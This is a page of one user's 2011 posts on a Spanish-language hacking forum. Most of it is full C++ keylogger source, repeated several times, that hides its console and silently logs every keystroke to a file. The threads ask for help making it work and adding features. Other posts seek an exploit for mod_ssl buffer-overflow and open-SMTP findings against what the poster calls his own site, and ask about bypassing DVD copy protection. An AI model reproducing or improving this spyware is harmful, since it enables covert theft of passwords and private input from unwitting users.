|
112
|
Seguridad Informática / Análisis y Diseño de Malware / Re: Duda con Keylogger C++
|
en: 12 Junio 2011, 16:19 pm
|
en Vista y Seven, debido a la uac, una aplicación que no se ejecuta como administrador no puede crear/modificar un archivo en c:... Diría que la cosa va por ahí. Valla!! Viene por defecto no?? Pero se podria quitar? o eso queda limitado siempre? Hola, no se si es solo al escribir tu codigo aqui, pero creo que en el segundo codigo te has olvidado: Si, error mio al pegarlo en el post, fue al escribir los comentarios cuando me lo comí sin querer, luego Fastama306 he probado todo lo que me has dicho pero me salta un error en esta linea #include <cstdlib> #include <iostream> #include <fstream> #include <string> #include <direct.h> #include <windows.h>
using namespace std;
int main() { FreeConsole(); string q="q"; string w="w"; string e="e"; string r="r"; string t="t"; string y="y"; string u="u"; string i="i"; string o="o"; string p="p"; string a="a"; string s="s"; string d="d"; string f="f"; string g="g"; string h="h"; string j="j"; string k="k"; string l="l"; string z="z"; string x="x"; string c="c"; string v="v"; string b="b"; string n="n"; string m="m"; string enter="[ENTER]"; string backspace="[BACKSPACE]"; string tab="[TAB]"; string spacebar=" ";
while(1) { Sleep(20); mkdir("C:\\registro\log.txt"); Sleep(20); if (GetAsyncKeyState('Q')==-32767) {log << q;} <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<ERROR>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> if (GetAsyncKeyState('W')==-32767) {log << w;} if (GetAsyncKeyState('E')==-32767) {log << e;} if (GetAsyncKeyState('R')==-32767) {log << r;} if (GetAsyncKeyState('T')==-32767) {log << t;} if (GetAsyncKeyState('Y')==-32767) {log << y;} if (GetAsyncKeyState('U')==-32767) {log << u;} if (GetAsyncKeyState('I')==-32767) {log << i;} if (GetAsyncKeyState('O')==-32767) {log << o;} if (GetAsyncKeyState('P')==-32767) {log << p;} if (GetAsyncKeyState('A')==-32767) {log << a;} if (GetAsyncKeyState('S')==-32767) {log << s;} if (GetAsyncKeyState('D')==-32767) {log << d;} if (GetAsyncKeyState('F')==-32767) {log << f;} if (GetAsyncKeyState('G')==-32767) {log << g;} if (GetAsyncKeyState('H')==-32767) {log << h;} if (GetAsyncKeyState('J')==-32767) {log << j;} if (GetAsyncKeyState('K')==-32767) {log << k;} if (GetAsyncKeyState('L')==-32767) {log << l;} if (GetAsyncKeyState('Z')==-32767) {log << z;} if (GetAsyncKeyState('X')==-32767) {log << x;} if (GetAsyncKeyState('C')==-32767) {log << c;} if (GetAsyncKeyState('V')==-32767) {log << v;} if (GetAsyncKeyState('B')==-32767) {log << b;} if (GetAsyncKeyState('N')==-32767) {log << n;} if (GetAsyncKeyState('M')==-32767) {log << m;} if (GetAsyncKeyState('1')==-32767) {log << 1;} if (GetAsyncKeyState('2')==-32767) {log << 2;} if (GetAsyncKeyState('3')==-32767) {log << 3;} if (GetAsyncKeyState('4')==-32767) {log << 4;} if (GetAsyncKeyState('5')==-32767) {log << 5;} if (GetAsyncKeyState('6')==-32767) {log << 6;} if (GetAsyncKeyState('7')==-32767) {log << 7;} if (GetAsyncKeyState('8')==-32767) {log << 8;} if (GetAsyncKeyState('9')==-32767) {log << 9;} if (GetAsyncKeyState('0')==-32767) {log << 0;} if (GetAsyncKeyState(13)==-32767) {log << enter;} if (GetAsyncKeyState(8)==-32767) {log << backspace;} if (GetAsyncKeyState(9)==-32767) {log << tab;} if (GetAsyncKeyState(32)==-32767) {log << spacebar;} log.close(); }/*while*/ return 0; }
|
|
|
113
|
Seguridad Informática / Análisis y Diseño de Malware / Re: Duda con Keylogger C++
|
en: 11 Junio 2011, 12:25 pm
|
Mejor instala un Hook al teclado haci te ahorras el alto consumo del procesador ( While ). Y me podrias orientar como?? la primera es q lo e probado en dos de mis equipos, en uno parece que realiza la funcion correctamente, crea un documento de txt en C: pero en el otro equipo no aparece!! A que puede deberse esto?? Sigo sin saber porque no funciona en algunos equipos , puede ser por el S.O? podria adaptarse algun codigo que te especifique la hora, o algo asi un poco más avanzadooo??? Una vez resueltas las dudas me gustaria agregarle esto, agradeceria vuestra ayuda gracias un saludo wh
|
|
|
114
|
Comunicaciones / Mensajería / Re: IRC HACKER
|
en: 11 Junio 2011, 10:59 am
|
Gracias a BoF que tan amablemente me ha facilitado la informacion
Irc.freenode.com canal ##0day
Os espero a todos alli
Un saludoo
Atentamente
WiseHidden
|
|
|
115
|
Seguridad Informática / Análisis y Diseño de Malware / Re: Duda con Keylogger C++
|
en: 11 Junio 2011, 10:55 am
|
Esto si que es curioso, he pasado a limpio el código en el equipo que si funcionaba, y resulta que ahora tampoco va!!!! Alguien me puede explicar el porque de esto?? lo agradeceria. Me he tomado la molestia de comentar la mayoria de las sentencias, si encuentran algun error agradeceria que lo notificaran, asi el codigo sera mas facil de estudiar. CODIGO: //KEYLOGGER KEYHIDDEN v0.1 (beta) // By WiseHidden Junio 2011
#include //Libreria que controla ciertos recursos del sistema operativo. #include <iostream> //Parte del a STL que contiene los algoritmos estándar de E/S. #include <fstream> //Flujos hacia/desde ficheros. #include <windows.h>
using namespace std; //Esto permite al programador tener acceso a todos los miembros del namespace y escribir instrucciones mas concisas
int main() // Todo programa en Cpp necesita esta funcion { FreeConsole(); //Oculta la consola del programa pero el programa trabaja en segundo plano string a="a"; // Cadenas de Texto string b="b"; // Cadenas de Texto string c="c"; // Cadenas de Texto string d="d"; // Cadenas de Texto string e="e"; // Cadenas de Texto string f="f"; // Cadenas de Texto string g="g"; // Cadenas de Texto string h="h"; // Cadenas de Texto string i="i"; // Cadenas de Texto string j="j"; // Cadenas de Texto string k="k"; // Cadenas de Texto string l="l"; // Cadenas de Texto string m="m"; // Cadenas de Texto string n="n"; // Cadenas de Texto string o="o"; // Cadenas de Texto string p="p"; // Cadenas de Texto string q="q"; // Cadenas de Texto string r="r"; // Cadenas de Texto string s="s"; // Cadenas de Texto string t="t"; // Cadenas de Texto string u="u"; // Cadenas de Texto string w="w"; // Cadenas de Texto string x="x"; // Cadenas de Texto string y="y"; // Cadenas de Texto string z="z"; // Cadenas de Texto string enter="[ENTER]"; // Cadenas de Texto string backspace="[BACKSPACE]"; // Cadenas de Texto string tab="[TAB]"; // Cadenas de Texto string spacebar=" "; // Cadenas de Texto while(1) //Nos permite repetir la ejecución de un bloque hasta tanto una condición booleana se vuelva falsa. { Sleep(20); //Retardado en 0,2 milisegundos ofstream log("C:\log.txt", ios::app); //Esta funcion creara un documento .txt en la ruta que le hemos designado Sleep(20); //Retardado en 0,2 milisegundos if(GetAsyncKeyState('A')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<a;} if(GetAsyncKeyState('B')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<b;} if(GetAsyncKeyState('C')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<c;} if(GetAsyncKeyState('D')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<d;} if(GetAsyncKeyState('E')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<e;} if(GetAsyncKeyState('F')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<f;} if(GetAsyncKeyState('G')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<g;} if(GetAsyncKeyState('H')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<h;} if(GetAsyncKeyState('I')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<i;} if(GetAsyncKeyState('J')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<j;} if(GetAsyncKeyState('K')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<k;} if(GetAsyncKeyState('L')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<l;} if(GetAsyncKeyState('M')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<m;} if(GetAsyncKeyState('N')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<n;} if(GetAsyncKeyState('O')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<o;} if(GetAsyncKeyState('P')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<p;} if(GetAsyncKeyState('Q')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<q;} if(GetAsyncKeyState('R')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<r;} if(GetAsyncKeyState('S')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<s;} if(GetAsyncKeyState('T')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<t;} if(GetAsyncKeyState('U')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<u;} if(GetAsyncKeyState('W')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<w;} if(GetAsyncKeyState('X')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<x;} if(GetAsyncKeyState('Y')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<y;} if(GetAsyncKeyState('Z')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<z;} if(GetAsyncKeyState('0')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<0;} if(GetAsyncKeyState('1')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<1;} if(GetAsyncKeyState('2')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<2;} if(GetAsyncKeyState('3')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<3;} if(GetAsyncKeyState('4')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<4;} if(GetAsyncKeyState('5')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<5;} if(GetAsyncKeyState('6')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<6;} if(GetAsyncKeyState('7')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<7;} if(GetAsyncKeyState('8')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<8;} if(GetAsyncKeyState('9')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<9;} if(GetAsyncKeyState(13)==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<enter;} if(GetAsyncKeyState(8)==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<backspace;} if(GetAsyncKeyState(9)==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<tab;} if(GetAsyncKeyState(32)==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no {log<<spacebar;} log.close(); }/*while*/ return 0; } UN SALUDO Atentamente WiseHidden
|
|
|
116
|
Seguridad Informática / Análisis y Diseño de Malware / Duda con Keylogger C++
|
en: 10 Junio 2011, 23:41 pm
|
Hola a todos, tengo un par de dudas acerca de este codigo, la primera es q lo e probado en dos de mis equipos, en uno parece que realiza la funcion correctamente, crea un documento de txt en C: pero en el otro equipo no aparece!! A que puede deberse esto?? La segunda duda es que el keylogger en si es muy sencillo, copia todo lo tecleado en un *.txt pero podria adaptarse algun codigo que te especifique la hora, o algo asi un poco más avanzadooo??? Os expongo aqui el codigo (el creador de este programa es kokehack) Lo encontre en la red. #include <cstdlib> #include <iostream> #include <fstream> #include <windows.h>
using namespace std;
int main() { FreeConsole(); string q="q"; string w="w"; string e="e"; string r="r"; string t="t"; string y="y"; string u="u"; string i="i"; string o="o"; string p="p"; string a="a"; string s="s"; string d="d"; string f="f"; string g="g"; string h="h"; string j="j"; string k="k"; string l="l"; string z="z"; string x="x"; string c="c"; string v="v"; string b="b"; string n="n"; string m="m"; string enter="[ENTER]"; string backspace="[BACKSPACE]"; string tab="[TAB]"; string spacebar=" ";
while(1) { Sleep(20); ofstream log("C:\\log.txt", ios::app); Sleep(20); if(GetAsyncKeyState('Q')==-32767) {log << q;} if (GetAsyncKeyState('W')==-32767) {log << w;} if (GetAsyncKeyState('E')==-32767) {log << e;} if (GetAsyncKeyState('R')==-32767) {log << r;} if (GetAsyncKeyState('T')==-32767) {log << t;} if (GetAsyncKeyState('Y')==-32767) {log << y;} if (GetAsyncKeyState('U')==-32767) {log << u;} if (GetAsyncKeyState('I')==-32767) {log << i;} if (GetAsyncKeyState('O')==-32767) {log << o;} if (GetAsyncKeyState('P')==-32767) {log << p;} if (GetAsyncKeyState('A')==-32767) {log << a;} if (GetAsyncKeyState('S')==-32767) {log << s;} if (GetAsyncKeyState('D')==-32767) {log << d;} if (GetAsyncKeyState('F')==-32767) {log << f;} if (GetAsyncKeyState('G')==-32767) {log << g;} if (GetAsyncKeyState('H')==-32767) {log << h;} if (GetAsyncKeyState('J')==-32767) {log << j;} if (GetAsyncKeyState('K')==-32767) {log << k;} if (GetAsyncKeyState('L')==-32767) {log << l;} if (GetAsyncKeyState('Z')==-32767) {log << z;} if (GetAsyncKeyState('X')==-32767) {log << x;} if (GetAsyncKeyState('C')==-32767) {log << c;} if (GetAsyncKeyState('V')==-32767) {log << v;} if (GetAsyncKeyState('B')==-32767) {log << b;} if (GetAsyncKeyState('N')==-32767) {log << n;} if (GetAsyncKeyState('M')==-32767) {log << m;} if (GetAsyncKeyState('1')==-32767) {log << 1;} if (GetAsyncKeyState('2')==-32767) {log << 2;} if (GetAsyncKeyState('3')==-32767) {log << 3;} if (GetAsyncKeyState('4')==-32767) {log << 4;} if (GetAsyncKeyState('5')==-32767) {log << 5;} if (GetAsyncKeyState('6')==-32767) {log << 6;} if (GetAsyncKeyState('7')==-32767) {log << 7;} if (GetAsyncKeyState('8')==-32767) {log << 8;} if (GetAsyncKeyState('9')==-32767) {log << 9;} if (GetAsyncKeyState('0')==-32767) {log << 0;} if (GetAsyncKeyState(13)==-32767) {log << enter;} if (GetAsyncKeyState(8)==-32767) {log << backspace;} if (GetAsyncKeyState(9)==-32767) {log << tab;} if (GetAsyncKeyState(32)==-32767) {log << spacebar;} log.close(); }/*while*/ return 0; }
gracias Un cordial saludoo WH
|
|
|
117
|
Seguridad Informática / Hacking / Re: Duda con el SSS (Escaneador de Puertos)
|
en: 10 Junio 2011, 12:32 pm
|
Buffers Overflow: Es un error de software que se produce cuando un programa no controla adecuadamente la cantidad de datos que se copian sobre un área de memoria reservada a tal efecto (buffer), de forma que si dicha cantidad es superior a la capacidad preasignada los bytes sobrantes se almacenan en zonas de memoria adyacentes, sobrescribiendo su contenido original
ShellCodes: código ejecutable especialmente preparado que se copia al host objeto del ataque para obtener los privilegios del programa vulnerable.
Exploits: es una pieza de software, un fragmento de datos, o una secuencia de comandos con el fin de automatizar el aprovechamiento de un error, fallo o vulnerabilidad, a fin de causar un comportamiento no deseado o imprevisto en los programas informáticos, hardware, o componente electrónico
VULNERABILIDADES
mod_ssl buffer Overflow Condition: Se ha descubierto un desbordamiento de búfer en "mod_ssl" que permite, bajo circunstancias muy especiales, la ejecución de código en el servidor. "mod_ssl" es un módulo Apache que le dota de la capacidad de soportar sesiones SSL (Secure Socket Layer, el protocolo utilizado en HTTPS).
Las versiones de "mod_ssl" previas a la 2.8.7 utilizan la librería "OpenSSL" de forma insegura, permitiendo un desbordamiento de búfer en la gestión de la caché de sesiones SSL. Aunque la posibilidad de explotación del problema parece bastante complicada en un entorno de producción, la versión 2.8.7 de "mod_ssl" soluciona el problema de forma proactiva.
La vulnerabilidad afecta también a "apache-ssl", ya que es un proyecto basado en "mod_ssl". En este caso la recomendación es actualizar a la versión 1.3.22+1.46.
SMTP without AuthLogin: Esta vulnerabilidad te permite mandar emails por el puerto 25, y no requiere de ningun exploit.
Bueno aunque ya empiezo a "vislumbrar" la primera capa del Iceberg aun ando muy perdido, he estado hojeando por la red sobre estas vulnerabilidades pero casi to la informaciçon viene en ingles o estan colgadas, alguien podria orientarme que tipo de exploit necesitaria y como explotarlo. REPITO EL ATAQUE SERA CONTRA MI WEB, DE ESE MODO LA PROTEGERE MEJOR
Gracias por todo
Un saludo
WH
|
|
|
118
|
Comunicaciones / Mensajería / Re: IRC HACKER
|
en: 9 Junio 2011, 23:11 pm
|
Si, he probado un par de veces conectarme al irc del foro, pero no habia nadie, asi q me extraño muchisimo!! . Depende del servidor en que te suelas mover y eso Disculpa mi ignorancia pero..... Depende del servidor en que me mueva? No entiendo!! gracias
|
|
|
119
|
Comunicaciones / Mensajería / IRC HACKER
|
en: 9 Junio 2011, 22:10 pm
|
Buenas a todos, llevo ya un par de años en el foro, y reconozco que es lo mejor que me ha pasado, pues he conocido a mucha gente que me han ayudado en todo lo que he necesitado, al igual que muchos me agradecen la ayuda o aporte que en algun momento yo les haya podido facilitar, la cosa que estoy buscando un buen irc donde hallan camaradas que les apasione este grandisimo mundo del hacking (Siempre desde el punto de vista etico) asi pues podrias orientarme un buen canal donde participar diariamente??
Os lo agradeceria de corazon
Un saludoooo
Atentamente Wisehidden
|
|
|
120
|
Informática / Software / Re: Como funciona el grabado de un dvd original
|
en: 7 Junio 2011, 18:16 pm
|
Si tienes el any dvd y el disco original lo puedes copiar con todo (menú,idiomas,extras,etc). Tendría que estar el dvd sin protección para poder grabarlo de esa forma. Es posible con el any dvd grabarlo si tener la proteccion del dvd??
|
|
|
|
|
|
|